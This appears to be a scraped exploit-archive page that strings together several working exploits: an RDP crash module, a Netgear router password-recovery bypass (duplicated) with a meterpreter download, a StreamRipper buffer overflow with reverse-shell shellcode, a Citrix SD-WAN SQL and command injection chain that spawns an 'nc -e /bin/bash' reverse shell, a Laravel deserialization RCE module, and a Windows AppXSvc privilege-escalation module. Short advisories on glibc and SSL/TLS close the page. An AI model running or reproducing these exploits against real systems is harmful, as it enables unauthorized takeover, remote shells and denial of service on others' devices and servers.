rc4enckey = RC4.new(rc4encstart)
vprint_status("Sending client info PDU") # TODO
pdu = pdu_client_info(datastore['RDP_USER'], datastore['RDP_DOMAIN'], datastore['RDP_CLIENT_IP'])
received = rdp_sendrecv(rdp_build_pkt(pdu, rc4enckey, hmackey, "\x03\xeb", true))
vprint_status("Received License packet")
rdp_recv()
vprint_status("Sending client confirm active PDU")
rdp_send(rdp_build_pkt(pdu_client_confirm_active(), rc4enckey, hmackey))
vprint_status("Sending client synchronize PDU")
rdp_send(rdp_build_pkt(pdu_client_synchronize(1009), rc4enckey, hmackey))
vprint_status("Sending client control cooperate PDU")
rdp_send(rdp_build_pkt(pdu_client_control_cooperate(), rc4enckey, hmackey))
vprint_status("Sending client control request control PDU")
rdp_send(rdp_build_pkt(pdu_client_control_request(), rc4enckey, hmackey))
vprint_status("Sending client input sychronize PDU")
rdp_send(rdp_build_pkt(pdu_client_input_event_sychronize(), rc4enckey, hmackey))
vprint_status("Sending client font list PDU")
rdp_send(rdp_build_pkt(pdu_client_font_list(), rc4enckey, hmackey))
vprint_status("Sending close mst120 PDU")
crash_test(rc4enckey, hmackey)
vprint_status("Sending client disconnection PDU")
rdp_send(rdp_build_data_tpdu("\x21\x80"))
return(true)
end
# ------------------------------------------------------------------------- #
def run_host(ip)
## Allow the run command to call the check command.
begin
if(open_connection())
status = produce_dos()
end
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError, ::TypeError => e
bt = e.backtrace.join("\n")
vprint_error("Unexpected error: #{e.message}")
vprint_line(bt)
elog("#{e.message}\n#{bt}")
rescue RdpCommunicationError => e
vprint_error("Error communicating RDP protocol.")
status = Exploit::CheckCode::Unknown
rescue Errno::ECONNRESET => e # NLA?
vprint_error("Connection reset, possible NLA is enabled.")
rescue => e
bt = e.backtrace.join("\n")
vprint_error("Unexpected error: #{e.message}")
vprint_line(bt)
elog("#{e.message}\n#{bt}")
ensure
if(status == true)
sleep(1)
unless(open_connection())
print_good("The host is crashed!")
else
print_bad("The DoS has been sent but the host is already connected!")
end
end
disconnect()
end
end
end
↧
Android VideoPlayer ihevcd_parse_pps Out-Of-Bounds Write
↧
Netgear WiFi Router JWNR2010v5 / R6080 Authentication Bypass
Netgear WiFi router versions JWNR2010v5 and R6080 suffer from authentication bypass vulnerabilities.
d620b4215510a859c511dd8ac8d9d84c# Exploit Title: NETGEAR WiFi Router R6080 - Security Questions Answers Disclosure
# Date: 13/07/2019
# Exploit Author: Wadeek
# Hardware Version: R6080-100PES
# Firmware Version: 1.0.0.34 / 1.0.0.40
# Vendor Homepage: https://www.netgear.com/support/product/R6080.aspx
# Firmware Link: http://www.downloads.netgear.com/files/GDC/R6080/(R6080-V1.0.0.34.zip or R6080-V1.0.0.40.zip)
== Files Containing Juicy Info ==
>> http://192.168.1.1/currentsetting.htm
Firmware=V1.0.0.34WW
Model=R6080
>> http://192.168.1.1:56688/rootDesc.xml (Server: Unspecified, UPnP/1.0, Unspecified)
<serialNumber>SSSSSSSNNNNNN</serialNumber>
== Security Questions Bypass > Answers Disclosure ==
>> http://192.168.1.1/401_recovery.htm (SSSSSSSNNNNNN value for input)
<POST REQUEST>
htpwd_recovery.cgi?id=XXXXXXXXXXXXXXX (one attempt because /tmp/SessionFile.*.htm)
(replace)
dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=securityquestions.htm&SID=
(by)
dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=PWD_password.htm&SID=
<POST RESPONSE>
<input type="text" maxLength="64" size="30" name="answer1" onFocus="this.select();" value="AnSw3R-1">
<input type="text" maxLength="64" size="30" name="answer2" onFocus="this.select();" value="AnSw3R-2">
(repeat recovery process for get admin password)
== Authenticated Telnet Command Execution ==
>> http://admin:Str0nG-!P4ssW0rD@192.168.1.1/setup.cgi?todo=debug
:~$ telnet 192.168.1.1
R6080 login: admin
Password: Str0nG-!P4ssW0rD
{
upload by TFTP # tftp -p -r [LOCAL-FILENAME] [IP] [PORT]
download by TFTP # tftp -g -r [REMOTE-FILENAME_ELF_32-bit_LSB_executable_MIPS || linux/mipsle/meterpreter/reverse_tcp] [IP] [PORT]
}
# Exploit Title: NETGEAR WiFi Router R6080 - Security Questions Answers Disclosure
# Date: 13/07/2019
# Exploit Author: Wadeek
# Hardware Version: R6080-100PES
# Firmware Version: 1.0.0.34 / 1.0.0.40
# Vendor Homepage: https://www.netgear.com/support/product/R6080.aspx
# Firmware Link: http://www.downloads.netgear.com/files/GDC/R6080/(R6080-V1.0.0.34.zip or R6080-V1.0.0.40.zip)
== Files Containing Juicy Info ==
>> http://192.168.1.1/currentsetting.htm
Firmware=V1.0.0.34WW
Model=R6080
>> http://192.168.1.1:56688/rootDesc.xml (Server: Unspecified, UPnP/1.0, Unspecified)
<serialNumber>SSSSSSSNNNNNN</serialNumber>
== Security Questions Bypass > Answers Disclosure ==
>> http://192.168.1.1/401_recovery.htm (SSSSSSSNNNNNN value for input)
<POST REQUEST>
htpwd_recovery.cgi?id=XXXXXXXXXXXXXXX (one attempt because /tmp/SessionFile.*.htm)
(replace)
dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=securityquestions.htm&SID=
(by)
dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=PWD_password.htm&SID=
<POST RESPONSE>
<input type="text" maxLength="64" size="30" name="answer1" onFocus="this.select();" value="AnSw3R-1">
<input type="text" maxLength="64" size="30" name="answer2" onFocus="this.select();" value="AnSw3R-2">
(repeat recovery process for get admin password)
== Authenticated Telnet Command Execution ==
>> http://admin:Str0nG-!P4ssW0rD@192.168.1.1/setup.cgi?todo=debug
:~$ telnet 192.168.1.1
R6080 login: admin
Password: Str0nG-!P4ssW0rD
{
upload by TFTP # tftp -p -r [LOCAL-FILENAME] [IP] [PORT]
download by TFTP # tftp -g -r [REMOTE-FILENAME_ELF_32-bit_LSB_executable_MIPS || linux/mipsle/meterpreter/reverse_tcp] [IP] [PORT]
}
↧
Streamripper 2.6 Buffer Overflow
Streamripper version 2.6 Song Pattern buffer overflow exploit.
dd24c19a7001e0ae2db79741d79b9334#!/usr/bin/python
#Exploit Title: StreamRipper32 Buffer Overflow
#Date: 07/2019
#Exploit Author: Andrey Stoykov (OSCP)
#Tested On: Win7 SP1 x64
#Software Link: http://streamripper.sourceforge.net/sr32/StreamRipper32_2_6.exe
#Version: 2.6
#Steps To Reproduce: Double click on "Add" in the "Station/Song Section" and paste the output in "Song Pattern"
file = open('exploit.txt', 'wb')
#msfpayload windows/shell_reverse_tcp LHOST=192.168.56.6 EXITFUNC=thread LPORT=4444 R | msfencode -e x86/alpha_mixed -b "\x00\x0a\x0d\xb4\xb8\xbc\xbd\xbe" -f c
shellcode = ("\xdb\xd7\xd9\x74\x24\xf4\x59\x49\x49\x49\x49\x49\x49\x49" +
"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a" +
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42" +
"\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75" +
"\x4a\x49\x39\x6c\x48\x68\x4b\x39\x53\x30\x65\x50\x63\x30" +
"\x45\x30\x4f\x79\x6b\x55\x64\x71\x4b\x62\x42\x44\x4e\x6b" +
"\x50\x52\x44\x70\x4e\x6b\x61\x42\x76\x6c\x4e\x6b\x61\x42" +
"\x52\x34\x6c\x4b\x54\x32\x46\x48\x56\x6f\x6e\x57\x70\x4a" +
"\x37\x56\x35\x61\x79\x6f\x56\x51\x4f\x30\x4c\x6c\x57\x4c" +
"\x31\x71\x71\x6c\x46\x62\x46\x4c\x77\x50\x6f\x31\x38\x4f" +
"\x66\x6d\x73\x31\x6b\x77\x79\x72\x78\x70\x66\x32\x33\x67" +
"\x6e\x6b\x43\x62\x34\x50\x4c\x4b\x43\x72\x75\x6c\x57\x71" +
"\x5a\x70\x6c\x4b\x61\x50\x30\x78\x6f\x75\x39\x50\x32\x54" +
"\x63\x7a\x36\x61\x4a\x70\x36\x30\x4c\x4b\x51\x58\x34\x58" +
"\x4c\x4b\x76\x38\x75\x70\x53\x31\x5a\x73\x79\x73\x35\x6c" +
"\x32\x69\x6e\x6b\x66\x54\x4e\x6b\x56\x61\x49\x46\x35\x61" +
"\x49\x6f\x74\x71\x6b\x70\x4c\x6c\x49\x51\x7a\x6f\x64\x4d" +
"\x55\x51\x79\x57\x54\x78\x49\x70\x32\x55\x58\x74\x44\x43" +
"\x73\x4d\x4b\x48\x55\x6b\x33\x4d\x76\x44\x33\x45\x6b\x52" +
"\x66\x38\x6c\x4b\x53\x68\x44\x64\x35\x51\x38\x53\x73\x56" +
"\x4c\x4b\x54\x4c\x70\x4b\x4c\x4b\x32\x78\x77\x6c\x35\x51" +
"\x5a\x73\x6e\x6b\x65\x54\x4c\x4b\x76\x61\x7a\x70\x4e\x69" +
"\x30\x44\x44\x64\x61\x34\x71\x4b\x73\x6b\x53\x51\x61\x49" +
"\x62\x7a\x42\x71\x4b\x4f\x59\x70\x52\x78\x53\x6f\x62\x7a" +
"\x6c\x4b\x57\x62\x4a\x4b\x4f\x76\x73\x6d\x51\x78\x74\x73" +
"\x36\x52\x37\x70\x45\x50\x52\x48\x64\x37\x31\x63\x35\x62" +
"\x33\x6f\x33\x64\x43\x58\x62\x6c\x33\x47\x36\x46\x37\x77" +
"\x39\x6f\x7a\x75\x6f\x48\x6e\x70\x73\x31\x35\x50\x53\x30" +
"\x45\x79\x68\x44\x43\x64\x46\x30\x32\x48\x56\x49\x6d\x50" +
"\x72\x4b\x33\x30\x39\x6f\x39\x45\x50\x50\x52\x70\x76\x30" +
"\x36\x30\x67\x30\x46\x30\x53\x70\x72\x70\x51\x78\x49\x7a" +
"\x56\x6f\x39\x4f\x49\x70\x69\x6f\x78\x55\x6b\x39\x6b\x77" +
"\x62\x48\x49\x50\x6f\x58\x54\x78\x53\x36\x50\x68\x73\x32" +
"\x45\x50\x66\x71\x31\x4c\x4d\x59\x79\x76\x42\x4a\x64\x50" +
"\x72\x76\x62\x77\x65\x38\x6e\x79\x6e\x45\x42\x54\x73\x51" +
"\x69\x6f\x78\x55\x61\x78\x35\x33\x30\x6d\x51\x74\x57\x70" +
"\x6b\x39\x4d\x33\x43\x67\x31\x47\x36\x37\x66\x51\x69\x66" +
"\x71\x7a\x75\x42\x32\x79\x62\x76\x59\x72\x69\x6d\x52\x46" +
"\x4b\x77\x51\x54\x31\x34\x65\x6c\x77\x71\x55\x51\x6c\x4d" +
"\x30\x44\x74\x64\x56\x70\x49\x56\x57\x70\x53\x74\x72\x74" +
"\x32\x70\x42\x76\x50\x56\x70\x56\x51\x56\x32\x76\x42\x6e" +
"\x66\x36\x33\x66\x73\x63\x66\x36\x45\x38\x64\x39\x58\x4c" +
"\x55\x6f\x4c\x46\x79\x6f\x79\x45\x6e\x69\x69\x70\x42\x6e" +
"\x61\x46\x77\x36\x49\x6f\x30\x30\x35\x38\x45\x58\x4c\x47" +
"\x45\x4d\x51\x70\x79\x6f\x38\x55\x4d\x6b\x4b\x50\x65\x4d" +
"\x57\x5a\x55\x5a\x73\x58\x49\x36\x4c\x55\x6d\x6d\x4d\x4d" +
"\x59\x6f\x6a\x75\x77\x4c\x64\x46\x73\x4c\x77\x7a\x4b\x30" +
"\x59\x6b\x59\x70\x50\x75\x33\x35\x6f\x4b\x61\x57\x46\x73" +
"\x62\x52\x70\x6f\x61\x7a\x45\x50\x33\x63\x69\x6f\x78\x55" +
"\x41\x41")
#74302E3F comctl32.DLL
buffer = "A"*256 + "\x3f\x2e\x30\x74" + "\x90"*10 + shellcode + "C"*(260-256-4-10)
file.write(buffer)
file.close()
↧
↧
Citrix SD-WAN Appliance 10.2.2 Authentication Bypass / Remote Command Execution
Citrix SD-WAN Appliance version 10.2.2 suffers from authentication bypass and remote command execution vulnerabilities.
1c552352db4cb01f5841843a21926509# Exploit Title: Citrix SD-WAN Appliance 10.2.2 Auth Bypass and Remote Command Execution
# Date: 2019-07-12
# Exploit Author: Chris Lyne (@lynerc)
# Vendor Homepage: https://www.citrix.com
# Product: Citrix SD-WAN
# Software Link: https://www.citrix.com/downloads/citrix-sd-wan/
# Version: Tested against 10.2.2
# Tested on:
# - Vendor-provided .OVA file
# CVE: CVE-2019-12989, CVE-2019-12991
#
# See Also:
# https://www.tenable.com/security/research/tra-2019-32
# https://medium.com/tenable-techblog/an-exploit-chain-against-citrix-sd-wan-709db08fb4ac
# https://support.citrix.com/article/CTX251987
#
# This code exploits both CVE-2019-12989 and CVE-2019-12991
# You'll need your own Netcat listener
import requests, urllib
import sys, os, argparse
import random
from OpenSSL import crypto
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
TIMEOUT = 10 # sec
def err_and_exit(msg):
print '\n\nERROR: ' + msg + '\n\n'
sys.exit(1)
# CVE-2019-12989
# auth bypass via file write
def do_sql_injection(base_url):
url = base_url + '/sdwan/nitro/v1/config/get_package_file?action=file_download'
headers = { 'SSL_CLIENT_VERIFY' : 'SUCCESS' }
token = random.randint(10000, 99999)
json = {
"get_package_file": {
"site_name" : "blah' union select 'tenable','zero','day','research' INTO OUTFILE '/tmp/token_" + str(token) + "';#",
"appliance_type" : "primary",
"package_type" : "active"
}
}
try:
r = requests.post(url, headers=headers, json=json, verify=False, timeout=TIMEOUT)
except requests.exceptions.ReadTimeout:
return None
# error is expected
expected = {"status":"fail","message":"Invalid value specified for site_name or appliance_type"}
if (r.status_code == 400 and r.json() == expected):
return token
else:
return None
# CVE-2019-12991
# spawns a reverse shell
def do_cmd_injection(base_url, token, ncip, ncport):
cmd = 'sudo nc -nv %s %d -e /bin/bash' % (ncip, ncport) #
url = base_url + '/cgi-bin/installpatch.cgi?swc-token=%d&installfile=`%s`' % (token, cmd)
success = False
try:
r = requests.get(url, verify=False, timeout=TIMEOUT)
except requests.exceptions.ReadTimeout:
success = True
# a timeout is success. it means we should have a shell
return success
##### MAIN #####
desc = 'Citrix SD-WAN Appliance Auth Bypass and Remote Command Execution'
arg_parser = argparse.ArgumentParser(description=desc)
arg_parser.add_argument('-t', required=True, help='Citrix SD-WAN IP Address (Required)')
arg_parser.add_argument('-ncip', required=True, help='Netcat listener IP')
arg_parser.add_argument('-ncport', type=int, default=4444, help='Netcat listener port (Default: 4444)')
args = arg_parser.parse_args()
print "Starting... be patient. This takes a sec."
# Path to target app
base_url = 'https://' + args.t
# do sql injection to get a swc-token for auth bypass
token = do_sql_injection(base_url)
if (token is None):
err_and_exit('SQL injection failed.')
print 'SQL injection successful! Your swc-token is ' + str(token) + '.'
# if this worked, do the command injection
# create a new admin user and spawn a reverse shell
success = do_cmd_injection(base_url, token, args.ncip, args.ncport)
if success is False:
err_and_exit('Not so sure command injection worked. Expected a timeout.')
print 'Seems like command injection succeeded.'
print 'Check for your shell!\n'
print 'To add an admin web user, run this command: perl /home/talariuser/bin/user_management.pl addUser eviladmin evilpassword 1'
↧
Microsoft Windows HTTP To SMB NTLM Reflection Privilege Escalation
↧
PHP Laravel Framework Token Unserialize Remote Command Execution
This Metasploit module exploits a vulnerability in the PHP Laravel Framework for versions 5.5.40, 5.6.x up to 5.6.29. Remote command execution is possible via a correctly formatted HTTP X-XSRF-TOKEN header, due to an insecure unserialize call of the decrypt method in Illuminate/Encryption/Encrypter.php. Authentication is not required, however exploitation requires knowledge of the Laravel APP_KEY. Similar vulnerabilities appear to exist within Laravel cookie tokens based on the code fix. In some cases the APP_KEY is leaked which allows for discovery and exploitation.
7094c48d642dbb2c66067663c6ef39d9##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'PHP Laravel Framework token Unserialize Remote Command Execution',
'Description' => %q{
This module exploits a vulnerability in the PHP Laravel Framework for versions 5.5.40, 5.6.x <= 5.6.29.
Remote Command Execution is possible via a correctly formatted HTTP X-XSRF-TOKEN header, due to
an insecure unserialize call of the decrypt method in Illuminate/Encryption/Encrypter.php.
Authentication is not required, however exploitation requires knowledge of the Laravel APP_KEY.
Similar vulnerabilities appear to exist within Laravel cookie tokens based on the code fix.
In some cases the APP_KEY is leaked which allows for discovery and exploitation.
},
'DisclosureDate' => '2018-08-07',
'Author' =>
[
'Ståle Pettersen', # Discovery
'aushack', # msf exploit + other leak
],
'References' =>
[
['CVE', '2018-15133'],
['CVE', '2017-16894'],
['URL', 'https://github.com/kozmic/laravel-poc-CVE-2018-15133'],
['URL', 'https://laravel.com/docs/5.6/upgrade#upgrade-5.6.30'],
['URL', 'https://github.com/laravel/framework/pull/25121/commits/d84cf988ed5d4661a4bf1fdcb08f5073835083a0']
],
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'DefaultTarget' => 0,
'Stance' => Msf::Exploit::Stance::Aggressive,
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl' },
'Payload' => { 'DisableNops' => true },
'Targets' => [[ 'Automatic', {} ]],
))
register_options([
OptString.new('TARGETURI', [ true, 'Path to target webapp', '/']),
OptString.new('APP_KEY', [ false, 'The base64 encoded APP_KEY string from the .env file', ''])
])
end
def check
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php'),
'method' => 'GET'
})
# Can be 'XSRF-TOKEN', 'X-XSRF-TOKEN', 'laravel_session', or $appname_session... and maybe more?
unless res && res.headers && res.headers.to_s =~ /XSRF-TOKEN|laravel_session/i
return CheckCode::Unknown
end
auth_token = check_appkey
if auth_token.blank? || test_appkey(auth_token) == false
vprint_error 'Unable to continue: the set datastore APP_KEY value or information leak is invalid.'
return CheckCode::Detected
end
random_string = Rex::Text.rand_text_alphanumeric(12)
1.upto(4) do |method|
vuln = generate_token("echo #{random_string}", auth_token, method)
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php'),
'method' => 'POST',
'headers' => {
'X-XSRF-TOKEN' => "#{vuln}",
}
})
if res.body.include?(random_string)
return CheckCode::Vulnerable
# Not conclusive but witnessed in the wild
elsif res.body.include?('Method Not Allowed')
return CheckCode::Safe
end
end
CheckCode::Detected
rescue Rex::ConnectionError
CheckCode::Unknown
end
def env_leak
key = ''
vprint_status 'Checking for CVE-2017-16894 .env information leak'
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, '.env'),
'method' => 'GET'
})
# Good but may be other software. Can also check for 'APP_NAME=Laravel' etc
return key unless res && res.body.include?('APP_KEY') && res.body =~ /APP_KEY\=base64:(.*)/
key = $1
if key
vprint_good "APP_KEY Found via CVE-2017-16894 .env information leak: #{key}"
return key
end
vprint_status 'Website .env file exists but didn\'t find a suitable APP_KEY'
key
end
def framework_leak(decrypt_ex = true)
key = ''
if decrypt_ex
# Possible config error / 0day found by aushack during pentest
# Seen in the wild with recent releases
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php'),
'method' => 'POST',
'headers' => {
'X-XSRF-TOKEN' => Rex::Text.rand_text_alpha(1) # May trigger
}
})
return key unless res && res.body.include?('DecryptException') && res.body.include?('APP_KEY')
else
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php'),
'method' => 'POST'
})
return key unless res && res.body.include?('MethodNotAllowedHttpException') && res.body.include?('APP_KEY')
end
# Good sign but might be more universal with e.g. 'vendor/laravel/framework' ?
# Leaks all environment config including passwords for databases, AWS, REDIS, SMTP etc... but only the APP_KEY appears to use base64
if res.body =~ /\>base64:(.*)\<\/span\>/
key = $1
vprint_good "APP_KEY Found via Laravel Framework error information leak: #{key}"
end
key
end
def check_appkey
key = datastore['APP_KEY'].present? ? datastore['APP_KEY'] : ''
return key unless key.empty?
vprint_status 'APP_KEY not set. Will try to find it...'
key = env_leak
key = framework_leak if key.empty?
key = framework_leak(false) if key.empty?
key.empty? ? false : key
end
def test_appkey(value)
value = Rex::Text.decode_base64(value)
return true if value && value.length.to_i == 32
false
end
def generate_token(cmd, key, method)
# Ported phpggc Laravel RCE php objects :)
case method
when 1
payload_decoded = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"' + "\x00" + '*' + "\x00" + 'events";O:15:"Faker\Generator":1:{s:13:"' + "\x00" + '*' + "\x00" + 'formatters";a:1:{s:8:"dispatch";s:6:"system";}}s:8:"' + "\x00" + '*' + "\x00" + 'event";s:' + cmd.length.to_s + ':"' + cmd + '";}'
when 2
payload_decoded = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"' + "\x00" + '*' + "\x00" + 'events";O:28:"Illuminate\Events\Dispatcher":1:{s:12:"' + "\x00" + '*' + "\x00" + 'listeners";a:1:{s:' + cmd.length.to_s + ':"' + cmd + '";a:1:{i:0;s:6:"system";}}}s:8:"' + "\x00" + '*' + "\x00" + 'event";s:' + cmd.length.to_s + ':"' + cmd + '";}'
when 3
payload_decoded = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":1:{s:9:"' + "\x00" + '*' + "\x00" + 'events";O:39:"Illuminate\Notifications\ChannelManager":3:{s:6:"' + "\x00" + '*' + "\x00" + 'app";s:' + cmd.length.to_s + ':"' + cmd + '";s:17:"' + "\x00" + '*' + "\x00" + 'defaultChannel";s:1:"x";s:17:"' + "\x00" + '*' + "\x00" + 'customCreators";a:1:{s:1:"x";s:6:"system";}}}'
when 4
payload_decoded = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"' + "\x00" + '*' + "\x00" + 'events";O:31:"Illuminate\Validation\Validator":1:{s:10:"extensions";a:1:{s:0:"";s:6:"system";}}s:8:"' + "\x00" + '*' + "\x00" + 'event";s:' + cmd.length.to_s + ':"' + cmd + '";}'
end
cipher = OpenSSL::Cipher.new('AES-256-CBC') # Or AES-128-CBC - untested
cipher.encrypt
cipher.key = Rex::Text.decode_base64(key)
iv = cipher.random_iv
value = cipher.update(payload_decoded) + cipher.final
pload = Rex::Text.encode_base64(value)
iv = Rex::Text.encode_base64(iv)
mac = OpenSSL::HMAC.hexdigest('SHA256', Rex::Text.decode_base64(key), iv+pload)
iv = iv.gsub('/', '\\/') # Escape slash
pload = pload.gsub('/', '\\/') # Escape slash
json_value = %Q({"iv":"#{iv}","value":"#{pload}","mac":"#{mac}"})
json_out = Rex::Text.encode_base64(json_value)
json_out
end
def exploit
auth_token = check_appkey
if auth_token.blank? || test_appkey(auth_token) == false
vprint_error 'Unable to continue: the set datastore APP_KEY value or information leak is invalid.'
return
end
1.upto(4) do |method|
sploit = generate_token(payload.encoded, auth_token, method)
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php'),
'method' => 'POST',
'headers' => {
'X-XSRF-TOKEN' => sploit,
}
}, 5)
# Stop when one of the deserialization attacks works
break if session_created?
if res && res.body.include?('The MAC is invalid|Method Not Allowed') # Not conclusive
print_status 'Target appears to be patched or otherwise immune'
end
end
end
end
↧
AppXSvc Hard Link Privilege Escalation
There exists a privilege escalation vulnerability for Windows 10 builds prior to build 17763. Due to the AppXSvc's improper handling of hard links, a user can gain full privileges over a SYSTEM-owned file. The user can then utilize the new file to execute code as SYSTEM. This Metasploit module employs a technique using the Diagnostics Hub Standard Collector Service (DiagHub) which was discovered by James Forshaw to load and execute a DLL as SYSTEM.
c94395650cca2e92c0d550946f0e7a22##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = NormalRanking
include Exploit::EXE
include Post::File
include Post::Windows::Priv
include Post::Windows::FileInfo
include Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'AppXSvc Hard Link Privilege Escalation',
'Description' => %q(
There exists a privilege escalation vulnerability for
Windows 10 builds prior to build 17763. Due to the AppXSvc's
improper handling of hard links, a user can gain full
privileges over a SYSTEM-owned file. The user can then utilize
the new file to execute code as SYSTEM.
This module employs a technique using the Diagnostics Hub Standard
Collector Service (DiagHub) which was discovered by James Forshaw to
load and execute a DLL as SYSTEM.
),
'License' => MSF_LICENSE,
'Author' =>
[
'Nabeel Ahmed', # Vulnerability discovery and PoC
'James Forshaw', # Code creating hard links and communicating with DiagHub service
'Shelby Pace' # Metasploit module
],
'References' =>
[
[ 'CVE', '2019-0841' ],
[ 'URL', 'https://krbtgt.pw/dacl-permissions-overwrite-privilege-escalation-cve-2019-0841/' ],
[ 'URL', 'https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html' ],
[ 'URL', 'https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html' ],
[ 'URL', 'https://0x00-0x00.github.io/research/2019/05/30/Coding-a-reliable-CVE-2019-0841-Bypass.html' ]
],
'Targets' =>
[
[ 'Windows 10', { 'Platform' => 'win' } ]
],
'DisclosureDate' => '2019-04-09',
'DefaultTarget' => 0
))
end
def check
return CheckCode::Unknown if sysinfo['OS'] !~ /windows\s10/i
path = expand_path('%WINDIR%\\system32\\win32k.sys')
major, minor, build, revision, brand = file_version(path)
return CheckCode::Appears if build < 17763
CheckCode::Detected
end
def upload_file(file_name, file_path)
contents = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-0841', file_name))
write_file(file_path, contents)
register_file_for_cleanup(file_path)
rescue
fail_with(Failure::UnexpectedReply, 'Failed to write file contents to target')
end
def init_process
print_status("Attempting to launch Microsoft Edge minimized.")
cmd_exec("cmd.exe /c start /min microsoft-edge:", nil, 30)
end
def mk_hard_link(src, target, link_exe)
out = cmd_exec("cmd.exe /c #{link_exe} \"#{src}\" \"#{target}\"")
return (out && out.include?('Done'))
end
def write_payload
print_status('Writing the payload to disk')
code = generate_payload_dll
@original_data = read_file(@rtf_path)
write_file(@rtf_path, code)
end
def exploit
vuln_status = check
fail_with(Failure::NotVulnerable, 'Failed to detect Windows 10') if vuln_status == CheckCode::Unknown
fail_with(Failure::None, 'Already running with SYSTEM privileges') if is_system?
cmd_exec("taskkill /F /IM MicrosoftEdge.exe /FI \"STATUS eq RUNNING\"")
dat_path = expand_path("%USERPROFILE%\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Settings\\Settings.dat")
fail_with(Failure::NotFound, 'Path does not exist') unless exist?(dat_path)
if session.arch == ARCH_X86
exe_name = 'CVE-2019-0841_x86.exe'
f_name = 'diaghub_load_x86.exe'
elsif session.arch == ARCH_X64
exe_name = 'CVE-2019-0841_x64.exe'
f_name = 'diaghub_load_x64.exe'
end
link_file_name = expand_path("%TEMP%\\#{Rex::Text.rand_text_alpha(6...8)}.exe")
upload_file(exe_name, link_file_name)
@rtf_path = expand_path('%WINDIR%\\system32\\license.rtf')
fail_with(Failure::UnexpectedReply, 'Did not retrieve expected output') unless mk_hard_link(dat_path, @rtf_path, link_file_name)
print_good('Successfully created hard link')
init_process
cmd_exec("taskkill /F /IM MicrosoftEdge.exe")
write_payload
diaghub_path = expand_path("%TEMP%\\#{Rex::Text.rand_text_alpha(8..12)}")
upload_file(f_name, diaghub_path)
cmd = "\"#{diaghub_path}\" \"license.rtf\""
cmd_exec(cmd)
end
def cleanup
folder_path = expand_path("%TEMP%\\etw")
dir_rm(folder_path)
write_file(@rtf_path, @original_data)
super
end
end
↧
↧
GNU glibc CVE-2019-1010023 Remote Code Execution Vulnerability
GNU glibc is prone to remote code execution vulnerability.
An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
Information
Exploit
The researcher has created a proof-of-concept to demonstrate the issue. Please see the references for more information.
References:
- glibc Homepage (GNU)
- GNU Homepage (GNU)
- Bug 22851 - ld library ELF load error (sourceware.org)
↧
SSL/TLS Protocol Initialization Vector Implementation Information Disclosure Vulnerability
The SSL and TLS protocols are prone to an information disclosure vulnerability.
A man-in-the-middle attacker can exploit this issue to decrypt encrypted traffic. This will result in a false sense of security, and potentially result in the disclosure of sensitive information.
Information
Xerox FreeFlow Print Server (FFPS) 91.D2.32
Xerox FreeFlow Print Server (FFPS) 82.D1.44
Xerox FreeFlow Print Server (FFPS) 81.D0.73
Xerox FreeFlow Print Server (FFPS) 73.D2.33
Xerox FreeFlow Print Server (FFPS) 73.C5.11
VMWare VirtualCenter 2.5
VMWare vCenter 5.0
VMWare vCenter 4.1
VMWare vCenter 4.0
VMWare Update Manager 5.0
VMWare ESX 4.1
VMWare ESX 4.0
VMWare ESX 3.5
Ubuntu Ubuntu Linux 11.10 i386
Ubuntu Ubuntu Linux 11.10 amd64
Ubuntu Ubuntu Linux 11.04 powerpc
Ubuntu Ubuntu Linux 11.04 i386
Ubuntu Ubuntu Linux 11.04 ARM
Ubuntu Ubuntu Linux 11.04 amd64
Ubuntu Ubuntu Linux 10.10 powerpc
Ubuntu Ubuntu Linux 10.10 i386
Ubuntu Ubuntu Linux 10.10 ARM
Ubuntu Ubuntu Linux 10.10 amd64
Ubuntu Ubuntu Linux 10.04 sparc
Ubuntu Ubuntu Linux 10.04 powerpc
Ubuntu Ubuntu Linux 10.04 i386
Ubuntu Ubuntu Linux 10.04 ARM
Ubuntu Ubuntu Linux 10.04 amd64
SuSE SUSE Linux Enterprise Software Development Kit 11 SP1 for SP2
SuSE SUSE Linux Enterprise Software Development Kit 11 SP1
SuSE SUSE Linux Enterprise Server for VMware 11 SP1
SuSE SUSE Linux Enterprise Server 11 SP1 for SP2
